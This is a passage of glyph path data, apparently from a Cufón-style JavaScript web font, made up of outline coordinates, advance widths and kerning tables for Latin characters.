7r-33,0r0,-196r33,0r0,21v26,-32,101,-38,118,5v23,-18,39,-31,72,-32","w":350,"k":{"y":4,"w":2,"v":4}},{"d":"123,-319v44,-5,64,58,30,79r89,240r-38,0r-26,-73r-112,0r-26,73r-35,0r88,-240v-34,-21,-14,-84,30,-79xm123,-252v14,0,23,-10,23,-23v0,-12,-9,-22,-23,-22v-14,0,-23,10,-23,22v0,13,9,23,23,23xm168,-103r-46,-126r-45,126r91,0xm172,-360r-43,36r-26,0r26,-36r43,0","w":246},{"d":"86,0r-42,0r0,-50r42,0r0,50","w":130,"k":{"\u2019":37,"\u201d":37,"\u2014":21,"\u2013":21,"-":28,",":23}},{"d":"49,-226v31,-1,61,-5,61,-37r27,0r0,236r54,0r0,27r-142,0r0,-27r54,0r0,-175r-54,0r0,-24","w":228},{"d":"243,69v-53,17,-97,-17,-81,-69r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170v22,0,41,-12,56,-24r0,-146r33,0r0,196v-10,-1,-6,10,-7,19v-4,32,35,32,55,22r0,28","w":226},{"d":"115,-267v71,0,90,56,90,136v0,82,-19,136,-90,136v-73,0,-91,-55,-91,-136v0,-83,19,-136,91,-136xm115,-24v54,0,54,-52,54,-107v0,-55,-1,-107,-54,-107v-53,0,-55,53,-55,107v0,56,0,107,55,107","w":228},{"d":"246,0r-46,0r-103,-117r-26,28r0,89r-35,0r0,-262r35,0r0,137r127,-137r42,0r-117,123","w":249,"k":{"\u2014":19,"\u2013":19,"\u0153":12,"\u0152":4,"\u00f8":12,"\u00e6":11,"\u00d8":4,"y":14,"w":12,"v":14,"u":9,"o":12,"e":12,"a":11,"O":4,"-":19}},{"d":"212,-207v-30,-30,-151,-51,-151,12v0,82,166,11,164,120v-1,92,-134,93,-201,59v2,-14,-4,-34,2,-44v33,36,155,60,163,-10v-9,-80,-164,-12,-164,-122v0,-82,129,-87,190,-56r0,41r-3,0","w":246,"k":{"\u2026":4,"\u00c6":4,"y":5,"w":4,"v":5,"S":4,"A":4,".":4,",":4}},{"d":"97,-173v-31,0,-56,25,-35,46v35,22,111,10,111,70v0,69,-107,74,-154,45v2,-11,-3,-29,2,-37v17,13,44,24,72,26v35,3,58,-23,39,-47v-35,-21,-112,-12,-112,-71v0,-67,98,-71,145,-45v-2,11,3,28,-2,35v-14,-12,-41,-22,-66,-22","w":187},{"d":"60,-149v53,-36,149,-19,149,64v0,52,-41,91,-90,90v-69,-2,-94,-48,-95,-120v-2,-102,55,-166,160,-148v-2,10,3,27,-2,34v-60,-25,-123,18,-122,80xm119,-23v35,0,55,-23,55,-60v0,-62,-74,-66,-114,-41v-3,58,9,101,59,101","w":228},{"d":"147,-25v40,1,64,-18,90,-35r0,41v-26,11,-51,24,-89,24v-85,0,-128,-50,-128,-136v0,-85,44,-135,129,-135v36,0,59,8,88,23v-2,13,4,32,-2,41v-25,-20,-49,-36,-89,-35v-61,2,-90,42,-90,106v0,64,31,104,91,106","w":251,"k":{"\u2014":9,"\u2013":9,"\u0152":4,"-":9}},{"d":"242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0","w":246,"k":{"\u2019":21,"\u2018":9,"\u201d":21,"\u201c":9,"\u2014":9,"\u2013":9,"y":9,"w":5,"v":9,"u":2,"t":4,"Y":14,"W":9,"V":11,"U":2,"T":21,"S":2,"-":9}},{"d":"68,-274r-8,102r-24,0r-7,-102r39,0","w":96,"k":{"\u00c6":18,"A":18}},{"d":"235,0r-34,0r0,-128r-131,0r0,128r-35,0r0,-262r35,0r0,103r131,0r0,-103r34,0r0,262","w":270},{"d":"24,-185v0,-50,35,-78,88,-77r82,0r0,326r-26,0r0,-303r-37,0r0,303r-26,0r0,-168v-47,-1,-82,-33,-81,-81","w":228},{"d":"106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170xm167,-229r-35,0r0,-34r35,0r0,34xm95,-229r-35,0r0,-34r35,0r0,34"},{"d":"333,-101r-306,0r0,-28r306,0r0,28","w":360,"k":{"\u00e6":4,"\u00c6":9,"z":7,"y":7,"x":9,"w":4,"v":7,"a":4,"Z":2,"Y":25,"X":14,"W":9,"V":9,"T":26,"S":4,"J":18,"I":5,"A":9}},{"d":"19,-97v0,-81,72,-130,140,-91r0,-86r33,0r0,274r-33,0r0,-21v-17,14,-35,27,-64,26v-51,-1,-76,-45,-76,-102xm103,-26v22,0,43,-10,56,-22r0,-113v-51,-27,-110,-2,-106,64v2,42,11,70,50,71","w":224},{"d":"97,20r-31,54r-26,0r18,-54r39,0xm67,-55v-1,33,40,34,67,24r0,29v-52,16,-101,0,-101,-62r0,-105r-22,0r0,-27r22,0r0,-57r33,0r0,57r68,0r0,27r-68,0","w":141},{"d":"130,-33v0,54,7,86,66,78r0,24v-68,6,-102,-22,-97,-94v3,-43,-23,-67,-69,-64r0,-27v56,4,72,-31,69,-89v-3,-53,39,-75,97,-69r0,25v-55,-7,-66,20,-66,77v0,37,-23,57,-51,68r0,4v29,11,51,30,51,67","w":228},{"d":"222,69v-47,14,-93,-9,-82,-64v-76,3,-109,-36,-109,-110r0,-157r35,0r0,159v-1,51,18,79,66,79v48,0,65,-27,65,-78r0,-160r35,0v-5,104,26,244,-63,263v-6,22,0,50,28,46v8,1,20,-5,25,-6r0,28","w":263},{"d":"66,-274v39,45,66,96,66,173v0,77,-27,129,-66,173v-13,-1,-29,2,-40,-1v41,-39,75,-94,75,-172v0,-80,-37,-131,-75,-173r40,0","w":163},{"d":"131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-14,37,-26,65,-27","k":{"y":4,"w":2,"v":4}},{"d":"130,-202v52,1,76,45,75,102v-1,60,-27,103,-86,105v-23,0,-37,-7,-53,-14r-3,9r-30,0r0,-274r33,0r0,98v17,-14,35,-26,64,-26xm66,-36v49,27,105,7,105,-63v0,-42,-11,-70,-49,-71v-23,0,-42,10,-56,22r0,112","w":224,"k":{"\u2026":4,"y":1,".":4,",":5}},{"d":"140,70v-53,14,-88,-20,-75,-70r-41,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27r-34,0v-5,21,-2,50,25,47r22,-5r0,28","w":151},{"d":"171,-360r-40,66r-40,0r-40,-66r28,0r32,45r32,-45r28,0xm222,-231r-94,0r0,231r-34,0r0,-231r-94,0r0,-31r222,0r0,31","w":221},{"d":"144,-67v-14,12,-44,10,-59,0r-42,42r-19,-20r41,-41v-10,-15,-11,-45,0,-60r-41,-41r20,-20r41,42v13,-12,44,-12,59,-1r41,-41r20,19r-41,42v11,14,10,45,0,60r41,41r-19,19xm115,-84v18,0,31,-14,31,-32v0,-17,-14,-34,-31,-33v-18,0,-32,15,-32,33v-1,17,14,32,32,32","w":228},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27","w":151,"k":{"\u2014":5,"\u2013":5,"-":5}},{"d":"140,-256v14,0,19,-15,20,-29r22,0v-1,32,-14,53,-44,54v-29,1,-36,-28,-60,-28v-13,0,-18,14,-19,29r-23,0v1,-32,17,-54,45,-54v27,0,36,28,59,28xm109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218},{"d":"248,-14r-203,-90r0,-22r203,-90r0,32r-160,69r160,70r0,31","w":294},{"d":"137,-99r-110,0r0,-31r110,0r0,31","w":163},{"d":"35,-251v55,-28,164,-22,159,56v-4,70,-56,94,-92,133r-37,32r140,0r0,30r-177,0r0,-37v37,-32,93,-80,118,-115v24,-35,12,-85,-38,-85v-29,0,-51,12,-73,23r0,-37","w":228},{"d":"139,-196v69,12,40,121,46,196r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v5,-62,-81,-42,-116,-29r0,-33r33,-7v-27,-26,-2,-72,37,-72v41,0,64,52,33,75xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44xm106,-203v13,1,22,-11,22,-24v0,-12,-9,-22,-22,-22v-14,0,-23,9,-23,22v0,14,9,24,23,24xm154,-324r-42,48r-27,0r27,-48r42,0","w":216},{"d":"103,-146r-42,0r0,-50r42,0r0,50xm116,-50r-50,115r-26,0r31,-115r45,0","w":163},{"d":"103,-146r-42,0r0,-50r42,0r0,50xm116,-50r-50,115r-26,0r31,-115r45,0","w":163},{"d":"5,42v29,14,68,4,57,-42r-29,0r0,-196r33,0r0,29v24,-22,48,-34,89,-27v-2,10,3,27,-2,34v-33,-11,-68,2,-87,21r0,135r23,0v11,58,-29,91,-84,74r0,-28","w":153},{"d":"168,-229r-35,0r0,-34r35,0r0,34xm96,-229r-35,0r0,-34r35,0r0,34","w":228},{"d":"69,-175r-25,0r-47,-99r43,0","w":96,"k":{"\u00c6":18,"A":18}},{"d":"202,-196r-79,196r-33,0r-79,-196r36,0r60,156r61,-156r34,0","w":213,"k":{"\u2014":7,"\u2013":7,"\u0153":3,"\u2026":32,"\u00f8":3,"\u00e6":7,"o":3,"e":3,"a":7,".":32,"-":7,",":32}},{"d":"104,-160v40,-6,51,-85,0,-85v-30,0,-48,36,-30,60v5,7,15,16,30,25xm56,-80v-4,66,92,73,117,25r-84,-82v-19,10,-31,28,-33,57xm187,-84v6,-21,5,-49,5,-76r34,0v1,38,-4,70,-19,95r66,65r-43,0r-40,-39v-22,27,-44,43,-85,44v-47,1,-86,-30,-85,-77v1,-41,24,-60,49,-77v-22,-14,-36,-26,-36,-57v0,-40,30,-61,73,-61v36,-1,68,20,68,54v-1,38,-22,55,-53,65","w":261},{"d":"109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75xm129,-229r-26,0r-48,-66r42,0","w":218},{"d":"98,-229r-33,0r0,-34r33,0r0,34xm34,-229r-33,0r0,-34r33,0r0,34xm66,0r-33,0r0,-196r33,0r0,196","w":98},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm129,-295r-35,0r0,-34r35,0r0,34xm57,-295r-35,0r0,-34r35,0r0,34","w":151},{"d":"180,-235r-131,0r0,-27r131,0r0,27xm106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79xm188,-361r-48,66r-26,0r32,-66r42,0","w":263},{"d":"106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170xm166,-295r-48,66r-26,0r32,-66r42,0"},{"d":"67,-55v-1,33,40,34,67,24v-1,13,5,32,-9,32v11,59,-37,85,-92,69v1,-9,-3,-23,2,-28v27,13,77,6,63,-38v-85,8,-62,-97,-65,-173r-22,0r0,-27r22,0r0,-57r33,0r0,57r68,0r0,27r-68,0","w":141},{"d":"312,-138r-21,0r0,-108r-4,0r-42,79r-13,0r-43,-81r-4,0r0,110r-22,0r0,-124r42,0r34,67r33,-67r40,0r0,124xm133,-241r-41,0r0,103r-22,0r0,-103r-40,0r0,-21r103,0r0,21","w":351},{"d":"220,-262r-92,147r0,115r-34,0r0,-111r-93,-151r39,0r71,117r72,-117r37,0xm165,-295r-35,0r0,-34r35,0r0,34xm93,-295r-35,0r0,-34r35,0r0,34","w":221},{"d":"202,-101r-175,0r0,-28r175,0r0,28","w":228,"k":{"\u00e6":4,"\u00c6":9,"z":7,"y":7,"x":9,"w":4,"v":7,"a":4,"Z":2,"Y":25,"X":14,"W":9,"V":9,"T":26,"S":4,"J":18,"I":5,"A":9}},{"d":"183,-360r-40,66r-40,0r-40,-66r28,0r32,45r32,-45r28,0xm226,0r-204,0r0,-32r161,-199r-155,0r0,-31r195,0r0,32r-163,199r166,0r0,31","w":246},{"d":"130,-202v52,1,75,43,75,101v0,81,-71,130,-139,91r0,82r-33,0r0,-346r33,0r0,98v16,-13,38,-26,64,-26xm66,-37v48,27,110,4,105,-63v-3,-42,-11,-69,-49,-70v-22,0,-42,10,-56,22r0,111","w":224},{"d":"98,-266v38,0,70,32,70,70v0,38,-32,70,-70,70v-39,0,-71,-31,-71,-70v0,-39,32,-70,71,-70xm98,-154v23,0,41,-19,41,-42v0,-23,-18,-43,-41,-43v-23,0,-42,19,-42,43v-1,23,19,43,42,42","w":195},{"d":"52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0xm167,-229r-35,0r0,-34r35,0r0,34xm95,-229r-35,0r0,-34r35,0r0,34","w":214},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm135,-298r-118,0r0,-28r118,0r0,28","w":151},{"d":"127,-128v40,6,77,17,77,61v-1,40,-37,64,-77,67r0,63r-21,0r0,-62v-29,0,-59,-7,-79,-16r0,-35v23,10,46,24,79,25r0,-76v-40,-8,-78,-20,-78,-63v0,-39,36,-63,78,-65r0,-48r21,0r0,47v23,0,51,9,68,14r0,34v-23,-8,-36,-21,-68,-22r0,76xm106,-204v-34,-3,-58,35,-35,59v6,5,18,10,35,14r0,-73xm127,-26v36,4,58,-38,33,-60v-7,-5,-18,-9,-33,-12r0,72","w":228},{"d":"100,-155v7,-74,42,-127,125,-109v-2,10,3,26,-2,32v-40,-15,-79,-2,-82,43r-7,34r56,0r0,24r-61,0v-17,81,-19,187,-135,164v1,-10,-2,-24,1,-32v42,16,73,-2,82,-46r18,-86r-38,0r0,-24r43,0","w":228},{"d":"169,-295r-48,66r-26,0r32,-66r42,0","w":228},{"d":"175,-150v32,9,58,30,58,69v-1,92,-104,82,-198,81r0,-262v76,3,176,-18,175,59v0,27,-15,44,-35,53xm70,-156v48,-1,104,9,104,-42v0,-46,-60,-31,-104,-34r0,76xm70,-30v58,-1,126,10,126,-49v0,-62,-69,-46,-126,-48r0,97","w":246,"k":{"\u2014":-2,"\u2013":-2,"\u2026":4,"T":11,".":4,"-":-2,",":4}},{"d":"201,0r-166,0r0,-262r35,0r0,231r131,0r0,31","w":200,"k":{"\u2019":28,"\u201d":28,"\u2014":28,"\u2013":28,"\u0152":4,"\u00d8":4,"\u00c7":4,"y":19,"v":19,"Y":28,"W":18,"V":19,"T":30,"O":4,"J":-18,"G":4,"C":4,"-":28,"'":21}},{"d":"91,-262r-5,190r-30,0r-5,-190r40,0xm89,0r-36,0r0,-37r36,0r0,37","w":141,"k":{"\u2019":18,"\u201d":18}},{"d":"242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0xm176,-295r-35,0r0,-34r35,0r0,34xm104,-295r-35,0r0,-34r35,0r0,34","w":246},{"d":"208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31xm145,-295r-26,0r-48,-66r42,0"},{"d":"155,-322v13,0,18,-14,19,-28r23,0v-2,32,-16,53,-45,54v-28,1,-36,-29,-59,-29v-14,0,-19,13,-19,29r-23,0v1,-31,16,-52,44,-53v28,-2,35,27,60,27xm242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0","w":246},{"d":"103,-146r-42,0r0,-50r42,0r0,50xm103,0r-42,0r0,-50r42,0r0,50","w":163,"k":{"\u2014":25}},{"d":"201,-34r-92,-73r0,-15r92,-74r0,33r-62,48r62,48r0,33xm126,-28r-97,-79r0,-16r97,-78r0,35r-65,51r65,52r0,35","w":232},{"d":"113,-24v28,0,46,-16,65,-25r0,37v-69,37,-160,7,-160,-86v0,-88,90,-126,160,-87v-2,11,3,29,-2,37v-16,-14,-38,-23,-63,-24v-40,0,-60,30,-60,74v0,44,20,74,60,74","w":187,"k":{"\u2014":4,"\u2013":4,"T":11,"-":4}},{"d":"91,-267v45,1,64,29,64,78v0,49,-19,78,-64,78v-45,0,-65,-30,-65,-78v0,-48,19,-78,65,-78xm277,-262r-137,262r-29,0r137,-262r29,0xm297,-150v45,0,64,29,64,77v0,49,-18,78,-64,78v-45,0,-66,-28,-65,-77v0,-48,19,-78,65,-78xm91,-135v29,0,33,-20,33,-54v0,-34,-4,-54,-33,-54v-29,0,-34,20,-34,54v0,34,5,54,34,54xm297,-18v29,0,33,-21,33,-55v0,-34,-4,-54,-33,-54v-30,0,-34,21,-34,55v0,34,5,54,34,54","w":387},{"d":"56,-132v0,91,85,129,163,95r0,-64r-70,0r0,-31r104,0r0,113v-25,12,-60,24,-95,24v-89,-1,-138,-47,-138,-136v0,-84,53,-136,138,-135v38,0,65,9,95,23r0,41v-29,-15,-55,-35,-101,-35v-60,0,-96,44,-96,105","w":279},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm100,-295r-26,0r-48,-66r42,0","w":151},{"d":"142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106xm164,-295r-26,0r-48,-66r42,0","w":283},{"d":"106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170xm134,-229r-26,0r-48,-66r42,0"},{"d":"210,-248v11,34,-1,72,-35,74v50,54,25,179,-66,179v-59,0,-90,-43,-90,-103v0,-73,53,-122,124,-98r16,0v34,4,32,-31,23,-52r28,0xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218},{"d":"257,-31r-219,0r0,-28r95,0r0,-74r-95,0r0,-28r95,0r0,-96r29,0r0,96r95,0r0,28r-95,0r0,74r95,0r0,28","w":294},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm127,-361r-48,66r-26,0r32,-66r42,0","w":151},{"d":"209,-262r-78,148r0,9r65,0r0,24r-65,0r0,24r65,0r0,24r-65,0r0,33r-33,0r0,-33r-65,0r0,-24r65,0r0,-24r-65,0r0,-24r65,0r0,-9r-79,-148r37,0r59,116r59,-116r35,0","w":228},{"d":"19,-100v0,-81,74,-124,140,-88r2,-8r31,0r0,174v8,89,-75,110,-152,88v1,-11,-2,-25,1,-34v40,18,126,24,118,-41r0,-18v-20,15,-32,24,-64,24v-50,0,-76,-42,-76,-97xm103,-34v23,1,42,-10,56,-20r0,-107v-48,-26,-110,-5,-106,60v3,41,12,66,50,67","w":224},{"d":"96,-108v4,41,-18,60,-39,78r147,0r0,30r-180,0r0,-36v30,-10,39,-30,39,-72r-31,0r0,-24r31,0v-8,-76,12,-135,80,-135v23,0,40,5,57,9v-2,11,3,29,-2,36v-35,-26,-109,-20,-102,39r0,51r73,0r0,24r-73,0","w":228},{"d":"19,-96v0,-82,71,-127,140,-91r0,-36r-64,0r0,-23r64,0r0,-28r33,0r0,28r32,0r0,23r-32,0r0,223r-33,0r0,-21v-17,14,-35,26,-64,26v-51,0,-76,-45,-76,-101xm103,-26v22,0,43,-10,56,-22r0,-112v-51,-26,-110,-1,-106,64v3,41,11,69,50,70","w":224},{"d":"130,-205v0,57,11,93,68,89r0,27v-56,-4,-68,32,-68,90v0,52,-40,73,-97,68r0,-24v41,2,68,-5,65,-47v-5,-54,13,-85,52,-98r0,-4v-37,-14,-57,-43,-52,-98v3,-41,-23,-50,-65,-47r0,-25v58,-5,97,16,97,69","w":228},{"d":"203,-107r-97,79r0,-35r65,-52r-65,-51r0,-35r97,78r0,16xm123,-107r-92,73r0,-33r62,-48r-62,-48r0,-33r92,74r0,15","w":232},{"d":"226,-360r-46,66r-24,0r29,-66r41,0xm155,-360r-46,66r-24,0r29,-66r41,0xm142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283},{"d":"181,-360r-40,66r-40,0r-40,-66r28,0r32,45r33,-45r27,0xm35,-262v127,-8,224,15,221,131v-2,89,-56,133,-155,131r-66,0r0,-262xm70,-30v89,5,150,-16,150,-101v0,-84,-61,-106,-150,-101r0,202","w":277},{"d":"142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283,"k":{"\u2026":5,"Z":4,"Y":4,"X":2,"T":9,".":5,",":5}},{"d":"52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0xm133,-229r-26,0r-48,-66r42,0","w":214},{"d":"197,-98v28,0,35,-33,35,-65r30,0v-3,48,-14,90,-64,93v-52,3,-61,-60,-100,-65v-28,4,-34,29,-36,66r-29,0v2,-49,15,-92,64,-94v51,-3,58,65,100,65","w":294},{"d":"66,0r-33,0r0,-274r33,0r0,274","w":98},{"d":"141,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm141,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106xm194,-295r-35,0r0,-34r35,0r0,34xm122,-295r-35,0r0,-34r35,0r0,34","w":283},{"d":"171,-294r-28,0r-32,-45r-32,45r-28,0r40,-66r40,0xm220,-262r-92,147r0,115r-34,0r0,-111r-93,-151r39,0r71,117r72,-117r37,0","w":221},{"d":"78,-161v68,-7,125,9,125,78v0,88,-104,105,-170,73v2,-11,-3,-29,2,-37v38,30,133,37,133,-36v0,-59,-75,-54,-124,-44r0,-135r158,0r0,31r-124,0r0,70","w":228},{"d":"211,-74r-38,0r0,74r-34,0r0,-74r-125,0r0,-40r126,-148r33,0r0,160r38,0r0,28xm139,-102r0,-118r-102,118r102,0","w":228},{"d":"235,0r-43,0r-124,-234r0,234r-33,0r0,-262r54,0r113,214r0,-214r33,0r0,262","w":269},{"d":"170,-322v14,0,19,-14,20,-28r22,0v-1,32,-15,53,-44,54v-28,1,-36,-29,-60,-29v-13,0,-18,14,-19,29r-23,0v1,-31,16,-52,45,-53v28,-2,35,27,59,27xm235,0r-43,0r-124,-234r0,234r-33,0r0,-262r54,0r113,214r0,-214r33,0r0,262","w":269},{"d":"97,69r-31,0r0,-343r31,0r0,343","w":163},{"d":"66,0r-33,0r0,-274r33,0r0,274xm104,-361r-48,66r-26,0r32,-66r42,0","w":98},{"d":"147,-25v40,1,64,-18,90,-35r0,41v-16,6,-29,14,-47,18v10,60,-37,87,-94,71v1,-9,-3,-24,2,-29v25,15,79,8,64,-37v-93,7,-142,-45,-142,-135v0,-85,44,-135,129,-135v36,0,59,8,88,23v-2,13,4,32,-2,41v-25,-20,-49,-36,-89,-35v-61,2,-90,42,-90,106v0,64,31,104,91,106","w":251,"k":{"\u2014":9,"\u2013":9,"\u0152":4,"-":9}},{"d":"66,-167v24,-22,48,-34,89,-27v-2,10,3,27,-2,34v-33,-11,-68,2,-87,21r0,139r-33,0r0,-196r33,0r0,29","w":153,"k":{"\u2019":-5,"\u201d":-5,"\u2014":4,"\u2013":4,"\u2026":51,"\u00e6":7,"a":6,".":51,"-":4,",":51}},{"d":"155,-295r-40,67r-40,0r-40,-67r28,0r32,45r33,-45r27,0xm175,0r-159,0r0,-24r115,-145r-112,0r0,-27r153,0r0,23r-115,145r118,0r0,28","w":189},{"d":"175,0r-159,0r0,-24r115,-145r-112,0r0,-27r153,0r0,23r-115,145r118,0r0,28","w":189,"k":{"\u2014":4,"\u2013":4,"\u00f8":2,"\u00e7":2,"q":2,"o":2,"g":2,"e":2,"d":2,"c":2,"-":4}},{"d":"62,42v33,14,81,4,64,-46r27,0v14,59,-33,91,-91,74r0,-28","w":228},{"d":"208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31xm182,-295r-35,0r0,-34r35,0r0,34xm110,-295r-35,0r0,-34r35,0r0,34"},{"d":"194,-95v-6,79,95,84,138,47r0,36v-47,26,-129,21,-153,-23v-14,23,-37,40,-71,40v-57,1,-89,-44,-89,-103v0,-61,32,-103,89,-104v35,0,57,18,71,42v15,-22,40,-42,76,-42v59,0,86,43,81,107r-142,0xm304,-120v5,-53,-59,-70,-91,-40v-10,10,-16,23,-18,40r109,0xm108,-23v38,0,54,-30,54,-75v0,-45,-15,-75,-54,-75v-40,0,-54,32,-55,75v-1,44,16,75,55,75","w":353},{"d":"63,-101v-1,81,36,132,75,173r-41,0v-39,-44,-65,-95,-65,-173v0,-77,27,-128,65,-173v13,2,32,-4,41,2v-41,38,-74,92,-75,171","w":163},{"d":"66,0r-33,0r0,-274r33,0r0,274xm152,-91r-40,0r0,-47r40,0r0,47","w":165},{"d":"125,-225r-36,0r0,-37r36,0r0,37xm56,-64v0,55,83,40,112,21r0,36v-55,24,-151,14,-148,-55v2,-51,40,-71,72,-90r0,-39r32,0r0,53v-27,18,-67,31,-68,74","w":196},{"d":"181,-294r-28,0r-33,-45r-32,45r-28,0r41,-66r39,0xm131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-274r33,0r0,99v18,-14,37,-26,65,-27"},{"d":"211,0r-44,0r-79,-86r-21,20r0,66r-33,0r0,-274r33,0r0,176r95,-98r42,0r-91,90","w":213,"k":{"\u2014":18,"\u2013":18,"\u0153":4,"\u00f8":4,"o":4,"e":4,"-":18}},{"d":"173,-228r-28,0r-32,-45r-33,45r-27,0r40,-67r40,0xm106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"300,-115v0,-40,-58,-21,-77,-9r0,-31v39,-20,111,-14,109,38v-2,50,-48,67,-76,93r88,0r0,24r-121,0r0,-26v27,-27,77,-43,77,-89xm30,-240v24,0,39,-1,42,-22r24,0r0,163r-29,0r0,-120r-37,0r0,-21xm248,-262r-137,262r-29,0r137,-262r29,0","w":360},{"d":"212,-207v-30,-30,-151,-51,-151,12v0,82,166,11,164,120v-1,42,-30,65,-64,75v11,59,-35,86,-92,70v1,-9,-3,-24,2,-29v24,15,77,7,63,-37v-45,4,-77,-7,-110,-20v2,-14,-4,-34,2,-44v33,36,155,60,163,-10v-9,-80,-164,-12,-164,-122v0,-82,129,-87,190,-56r0,41r-3,0","w":246},{"d":"140,-256v14,0,19,-15,20,-29r22,0v-1,32,-14,53,-44,54v-29,1,-36,-28,-60,-28v-13,0,-18,14,-19,29r-23,0v1,-32,17,-54,45,-54v27,0,36,28,59,28xm36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216},{"d":"139,-175r-24,0r-47,-99r42,0xm68,-175r-24,0r-47,-99r42,0","w":165,"k":{"\u00c6":18,"A":18}},{"d":"207,-191v0,40,-22,66,-54,77r99,114r-45,0r-88,-104r-49,0r0,104r-35,0r0,-262v82,0,173,-10,172,71xm70,-133v54,2,100,0,100,-55v0,-48,-51,-45,-100,-44r0,99","w":250,"k":{"\u2019":12,"\u201d":12,"\u2014":18,"\u2013":18,"\u0153":11,"\u00f8":9,"\u00e6":9,"y":10,"u":4,"o":9,"e":9,"a":7,"Y":4,"T":11,"-":18}},{"d":"211,0r-44,0r-79,-86r-21,20r0,66r-33,0r0,-274r33,0r0,176r95,-98r42,0r-91,90xm39,42v33,14,81,4,64,-46r27,0v14,59,-33,91,-91,74r0,-28","w":213},{"d":"101,-228r-27,0r-25,-47r-25,47r-26,0r31,-67r40,0xm66,0r-33,0r0,-196r33,0r0,196","w":98},{"d":"173,-295r-40,67r-40,0r-40,-67r28,0r33,45r32,-45r27,0xm52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214},{"d":"132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-